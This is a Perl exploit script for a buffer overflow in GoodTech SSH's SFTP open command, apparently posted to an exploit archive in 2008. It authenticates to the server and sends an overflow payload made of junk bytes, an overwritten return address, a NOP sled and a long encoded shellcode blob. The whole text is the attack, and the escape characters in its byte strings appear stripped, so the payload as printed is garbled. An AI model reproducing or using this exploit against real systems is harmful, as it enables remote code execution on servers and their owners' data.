goodtechssh-overflow.txt
Posted on 23 October 2008
# GoodTech SSH Remote Buffer Overflow Exploit # Written by r0ut3r - writ3r [at] gmail.com # # SSH_FXP_OPEN command contains a buffer oveflow. # # All other operations are also vulnerable, opendir, unlink, etc. use Net::SSH2; my $user = "root"; my $pass = "yahh"; my $ip = "127.0.0.1"; my $port = 22; my $ssh2 = Net::SSH2->new(); print "[+] Connecting... "; $ssh2->connect($ip, $port) || die "[-] Unable to connect! "; $ssh2->auth_password($user, $pass) || "[-] Incorrect credentials "; print "[+] Sending payload "; my $junk = 'A'x164; my $eip = "x49x13x9cx7c"; #call esp my $nops = "x90"x20; my $shellcode = "x31xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x33". "x2ex9cx0ex83xebxfcxe2xf4xcfx44x77x43xdbxd7x63xf1". "xccx4ex17x62x17x0ax17x4bx0fxa5xe0x0bx4bx2fx73x85". "x7cx36x17x51x13x2fx77x47xb8x1ax17x0fxddx1fx5cx97". "x9fxaax5cx7ax34xefx56x03x32xecx77xfax08x7axb8x26". "x46xcbx17x51x17x2fx77x68xb8x22xd7x85x6cx32x9dxe5". "x30x02x17x87x5fx0ax80x6fxf0x1fx47x6axb8x6dxacx85". "x73x22x17x7ex2fx83x17x4ex3bx70xf4x80x7dx20x70x5e". "xccxf8xfax5dx55x46xafx3cx5bx59xefx3cx6cx7ax63xde". "x5bxe5x71xf2x08x7ex63xd8x6cxa7x79x68xb2xc3x94x0c". "x66x44x9exf1xe3x46x45x07xc6x83xcbxf1xe5x7dxcfx5d". "x60x7dxdfx5dx70x7dx63xdex55x46x8dx52x55x7dx15xef". "xa6x46x38x14x43xe9xcbxf1xe5x44x8cx5fx66xd1x4cx66". "x97x83xb2xe7x64xd1x4ax5dx66xd1x4cx66xd6x67x1ax47". "x64xd1x4ax5ex67x7axc9xf1xe3xbdxf4xe9x4axe8xe5x59". "xccxf8xc9xf1xe3x48xf6x6ax55x46xffx63xbaxcbxf6x5e". "x6ax07x50x87xd4x44xd8x87xd1x1fx5cxfdx99xd0xdex23". "xcdx6cxb0x9dxbex54xa4xa5x98x85xf4x7cxcdx9dx8axf1". "x46x6ax63xd8x68x79xcex5fx62x7fxf6x0fx62x7fxc9x5f". "xccxfexf4xa3xeax2bx52x5dxccxf8xf6xf1xccx19x63xde". "xb8x79x60x8dxf7x4ax63xd8x61xd1x4cx66xdcxe0x7cx6e". "x60xd1x4axf1xe3x2ex9cx0e"; my $payload = $junk.$eip.$nops.$shellcode; my $sftp = $ssh2->sftp(); $sftp->open($payload); print "[+] Sent"; $ssh2->disconnect;
